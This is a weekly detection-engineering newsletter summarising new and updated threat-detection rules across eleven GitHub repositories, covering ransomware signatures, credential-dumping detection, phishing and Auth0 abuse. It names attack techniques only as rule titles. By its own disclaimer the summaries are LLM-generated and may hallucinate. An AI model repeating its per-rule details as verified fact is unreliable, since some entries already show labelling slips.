This week's update highlights the most significant changes to detection rules from 11 of the 40+ monitored GitHub repositories. Between Feb 24 and Mar 3, 2025, contributors added 83 new rules and updated 80 existing ones.

Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Summary

Security teams made major updates across multiple repositories, strengthening detection for container activity, Linux threats, phishing, and cloud security.

FalcoSecurity refined its container monitoring rule for better coverage in k3s environments, while SigmaHQ added a rule to detect CVE-2024-35250 exploitation and improved detection of process memory dumps via Comsvcs.DLL. ReversingLabs expanded its YARA rules with new signatures for Elpaco ransomware and MiyaRAT backdoors.

Elastic added 12 Linux rules for lateral movement, privilege escalation, and SSH-based attacks. Five Windows rules were also refined for better event filtering.

Sublime Security focused on phishing detection, introducing 6 new rules for QR code and brand impersonation attacks while fine-tuning 13 others to reduce false positives. Anvilogic added 50 (!) new Auth0 rules for credential abuse and MFA monitoring.

Chainguard updated 27 rule updates optimizing HTTPS traffic monitoring, persistence detection, and privilege escalation signals. Splunk refined five Windows and cloud security rules, improving detection logic for AD replication, O365 takeovers, and InstallUtil abuse.

In personal repositories, Neo23x0 strengthened YARA-based malware detection with new Lockbit4.0 packer and BabbleLoader rules, while SlimKQL added five new hunting queries for M365, EDR bypass attempts, Exchange Online monitoring, and OSINT-based threat intelligence tracking.

Table Of Contents

• Corporate repositories (9)

  • falcosecurity/rules (✎1)

  • SigmaHQ/sigma (+1, ✎1)

  • reversinglabs/reversinglabs-yara-rules (+2)

  • elastic/detection-rules (+12, ✎5)

  • sublime-security/sublime-rules (+6, ✎13)

  • Yamato-Security/hayabusa-rules (+1)

  • anvilogic-forge/armory (+50)

  • chainguard-dev/osquery-defense-kit (+1, ✎27)

  • splunk/security_content (✎5)

• Personal repositories (2)

  • Neo23x0/signature-base (+5, ✎3)

  • SlimKQL/Hunting-Queries-Detection-Rules (+5)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (9)

falcosecurity/rules (✎1)

https://github.com/falcosecurity/rules

The team updated the containerd_activities rule to catch paths starting with '/var/lib/rancher/k3s/agent/containerd/' for containerd events (✎containerd_activities). This change aims to improve detection coverage for containerd-related activities in k3s environments.

SigmaHQ/sigma (+1, ✎1)

https://github.com/SigmaHQ/sigma

A new rule detects potential exploitation of CVE-2024-35250 by flagging unusual loading of ksproxy.ax and applying filters for common apps (+Potential CVE-2024-35250 Exploitation Activity).

The detection logic for process memory dump via Comsvcs.DLL events has been modified. It now covers additional command line conditions and includes an updated reference link (+Process Memory Dump Via Comsvcs.DLL).

reversinglabs/reversinglabs-yara-rules (+2)

https://github.com/reversinglabs/reversinglabs-yara-rules/

ReversingLabs updated its YARA rules. They added a rule to detect Elpaco ransomware using detailed metadata and signature definitions (+Win32_Ransomware_Elpaco). They also added a rule to catch the MiyaRAT backdoor using multiple patterns (+Win64_Backdoor_MiyaRAT).

Cybersec Feeds Overview summarizes updates from 80+ security RSS feeds by vendors, government agencies, security research teams, experts, and communities of practitioners. Created by CTIChef.com

Read the latest issue

elastic/detection-rules (+12, ✎5)

https://github.com/elastic/detection-rules

Elastic added 12 new Linux detection rules. These include detections for code obfuscation and lateral movement tactics. New rules target base64 decoded payloads piped to interpreters (+Base64 Decoded Payload Piped to Interpreter), file creation in world writeable directories (+Remote File Creation in World Writeable Directory) and unusual remote file creation (+Unusual Remote File Creation). Rules also detect potential malware-driven SSH brute force attempts (+Potential Malware-Driven SSH Brute Force Attempt), unusual SSH authentications from both IPs (+Successful SSH Authentication from Unusual IP Address) and public keys (+Successful SSH Authentication from Unusual SSH Public Key). Additional rules cover high egress network connections from unusual executables (+High Number of Egress Network Connections from Unusual Executable), user account credential modifications via echo (+Linux User Account Credential Modification), kill command execution (+Kill Command Execution), deletion of SSH authorized_keys files (+SSH Authorized Keys File Deletion) and unusual file transfer utility launches (+Unusual File Transfer Utility Launched) along with unusual base64 encoding/decoding activities (+Unusual Base64 Encoding/Decoding Activity).

Updates were also made to Windows rules. The modifications refine event filtering and query logic to improve detection accuracy. Updated rules include the one for privilege escalation via named pipe impersonation (✎Privilege Escalation via Rogue Named Pipe Impersonation), remote file copy to hidden share (✎Remote File Copy to a Hidden Share), AMSI bypass via PowerShell (✎Potential Antimalware Scan Interface Bypass via PowerShell), file transfer via curl (✎Potential File Transfer via Curl for Windows) and file creation time modifications (✎File Creation Time Changed).

sublime-security/sublime-rules (+6, ✎13)

https://github.com/sublime-security/sublime-rules

Sublime Security has added multiple detection rules that target phishing and impersonation through QR codes, open redirects, and unusual sender characteristics. The new rules identify attachments with QR codes that embed Base64 email addresses (+Attachment: QR Code Link With Base64-Encoded Recipient Address) and Unicode-based QR codes (+Unicode QR Code). They also added rules to catch open redirects to convertcart.com (+Open Redirect: convertcart.com), callback phishing via Zelle (+Callback phishing via Zelle Service Abuse), Social Security Administration fraud attempts (+Callback Phishing: Social Security Administration Fraud), and messages with long local parts from untrusted senders (+Unusually Long Local Part From Untrusted Sender Address).

Several rules were updated to improve detection accuracy and reduce false positives. The detection logic for image and PDF attachments in callback phishing was refined (+Attachment: Callback Phishing solicitation via image file, ✎Attachment: Callback Phishing solicitation via pdf file). Updates also improved matching conditions for Adobe QR codes (+Brand impersonation: Adobe (QR code)), MetaMask (+Brand Impersonation: MetaMask), Binance (+Brand impersonation: Binance), and Quickbooks (+Brand impersonation: Quickbooks). Additional updates refine rules for callback phishing in the email body (✎Callback Phishing solicitation in message body), QR codes with suspicious language (✎Link: QR Code with suspicious language (untrusted sender)), corporate services impersonation (+Credential phishing language and suspicious indicators (unknown sender)), suspicious RFQ/RFP activity (+Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern), and cross-site scripting in subject lines (✎Suspected Cross-Site Scripting (XSS) found in subject).

Yamato-Security/hayabusa-rules (+1)

https://github.com/Yamato-Security/hayabusa-rules

The team at Yamato-Security added a rule to detect potential exploitation using CVE-2024-35250. The rule flags suspicious loading of "ksproxy.ax" that may signal a privilege escalation attack (+Potential CVE-2024-35250 Exploitation Activity).

anvilogic-forge/armory (+50)

https://github.com/anvilogic-forge/armory

The team at anvilogic-forge added a large set of Auth0 rules that boost detection of brute-force, credential stuffing, and automated login failures. Rules cover excessive login failures, both for multiple accounts and single IPs, as well as general failed logins and incorrect credentials (+Auth0: Excessive Login Failures or Signups, +Auth0: Excessive Login Failures for Single Account, +Auth0: Excessive Login Failures from Single IP, +Auth0: Failed Login, +Auth0: Incorrect Password, +Auth0: Invalid Email_Username).

A second set of rules targets multifactor authentication. They monitor updates, unenrollments, failed enrollment attempts, rejected or failed MFA events, and even a successful MFA login after repeated failures (+Auth0: MFA Device Updated, +Auth0: MFA Device Unenrolled, +Auth0: MFA Authentication Failed, +Auth0: MFA Enrollment Failed, +Auth0: MFA Enrollment Started, +Auth0: MFA Notification Failure, +Auth0: Failed Voice Call for MFA, +Auth0: Successful MFA Login After Multiple Failures).

New rules also address token management and exchange. They monitor failed refresh and access token exchanges, CIBA token exchange failures, and abnormal passwordless login code or link events (+Auth0: Failed Refresh Token Exchange, +Auth0: Failed Access Token Exchange, +Auth0: Failed CIBA Token Exchange Attempt, +Auth0: Passwordless Login Code or Link Sent).

Additional rules cover changes in user management and configuration events. They record guardian tenant updates that can weaken MFA, warnings during user operations, email notification or verification failures, failed invitation acceptances, organization member additions, and SSO ticket issues (+Auth0: Guardian tenant update, +Auth0: User management warning events, +Auth0: Email Notification Failure, +Auth0: Email Verification Failed, +Auth0: Failed to Accept User Invitation, +Auth0: Member Added to Organization, +Auth0: SSO Ticket Failure, +Auth0: User Block Released from Anomaly Detection, +Auth0: User Created).

Other updates add detections for high volume operations and misconfigurations. These rules monitor spikes in authentication attempts, API rate limit increases, OTP abuse, OIDC back-channel logout failures, failed username changes, device rejections, and native social logins (+Auth0: High volume auth attempts, +Auth0: API Rate Limit Increased, +Auth0: OTP Rate Limit Exceeded, +Auth0: OIDC Back-Channel Logout Failed, +Auth0: Failed username change, +Auth0: Device Rejected by User, +Auth0: Native Social Login, +Auth0: Resources Exceeding Defined Limits Removed).

chainguard-dev/osquery-defense-kit (+1, ✎27)

https://github.com/chainguard-dev/osquery-defense-kit

The team added a new rule to flag processes spawned by executables with matching ctime and mtime, a sign of possible timestomping activity (+Touched Executable Detection).

Detection logic for HTTPS communications was updated on both Linux and macOS. Changes include adding exceptions for processes like argo, minecraft-launcher, git-remote-http, zig, apkoaas, licenseDaemon, and proctor while removing or updating obsolete exceptions such as art, multipassd, and firefox-bin (✎Unexpected programs communicating over HTTPS (state-based) – Linux, ✎Unexpected programs communicating over HTTPS (state-based) – macOS).

Other rules were refined to reduce false positives and improve coverage. Updates include adjusted exclusion lists and WHERE clauses in rules for high disk bytes written, high disk bytes read, unexpected DNS traffic, user executables on macOS, unexpected PCAP user activity, suspicious fetch tool parenting, execution directory on Linux, and unexpected disk image sources (✎High Disk Bytes Written Detection, ✎High Disk Bytes Read Detection, ✎Catch DNS traffic going to machines other than the host-configured DNS server, ✎Unexpected User Executables on MacOS, ✎Unexpected PCAP User Detection, ✎Suspicious parenting of fetch tools, ✎Unexpected Execution Directory – Linux, ✎Unexpected Disk Image Source Detection).

Additional tweaks were made in rules for keylogging and privileged container detection. New exceptions were added for keyboard sniffer detections and updates to command filters now ignore commands like '/bin/k3s server' (✎macOS Keyboard Sniffer, ✎Unexpected Privileged Containers Detection).

splunk/security_content (✎5)

https://github.com/splunk/security_content

The team at Splunk improved detection accuracy by modifying several rules. The search query was updated and false positives corrected in the Windows AD Replication Request Initiated by User Account rule (✎Windows AD Replication Request Initiated by User Account). The O365 Email Receive and Hard Delete Takeover Behavior rule removed the ClientProcessName field and removed the True Positive Test section to adjust the testing strategy (✎O365 Email Receive and Hard Delete Takeover Behavior).

The Windows InstallUtil Remote Network Connection rule now has new field names and better data aggregation for process and network tracking (✎Windows InstallUtil Remote Network Connection). Updates to the rule version were also applied in both the Windows PowerShell Process With Malicious String (✎Windows PowerShell Process With Malicious String) and Windows System Remote Discovery With Query (✎Windows System Remote Discovery With Query) rules, indicating performance and logic improvements without altering the underlying search structure.

What SIEM do you use? Tell us!

Personal repositories (2)

Neo23x0/signature-base (+5, ✎3)

https://github.com/Neo23x0/signature-base

New YARA rules target Lockbit4.0 by detecting its packer, RC4 use, and custom hashing algorithm (+mal_lockbit4_packed_feb24, +Detect the implementation of RC4 Algorithm by Lockbit4.0, +mal_lockbit4_hashing_alg_win_feb24). The packer rule was updated with improved jump and unpacking string patterns (✎mal_lockbit4_packed_feb24).

A new BabbleLoader detection rule is added (+mal_babbleloader_win_jan24) and later updated to adjust string matching for decryption, hashing, and related markers (✎mal_babbleloader_win_jan24).

A new rule to spot email redirection spoofing was added (+SUSP_Email_Redirection_Spoofing_Feb25) and updated to switch from regex conditions to a more direct string match approach (✎SUSP_Email_Redirection_Spoofing_Feb25).

SlimKQL/Hunting-Queries-Detection-Rules (+5)

https://github.com/SlimKQL/Hunting-Queries-Detection-Rules

SlimKQL added five new queries that broaden detection coverage.

The Exploring M365 Accounts Investigation rule tracks M365 logins and cloud app events linked to VPN use (+Exploring M365 Accounts Investigation). The EDR and AV Killer rule now finds driver exploitation using legacy Truesight.sys variants by looking over a 90-day window (+EDR and AV Killer - A Large Scale Driver Exploitation Detection).

A new query calculates outbound email traffic in Exchange Online for the past 30 days to spot unusual volume changes (+Tenant External Recipient Rate Limit (TERR)). Additionally, two new queries use external threat intel: the DefenderXDR Weekly OSINT Indicators Scan pulls in multiple indicator types over a 30-day period (+DefenderXDR Weekly OSINT Indicators Scan) and the GitLab Threat Intelligence rule flags 16 malicious Chrome extensions (+GitLab Threat Intelligence Identified 16 Malicious Chrome extensions).

Feedback

Your input helps us improve! We'd love to hear from you if you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.

Disclaimer

The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.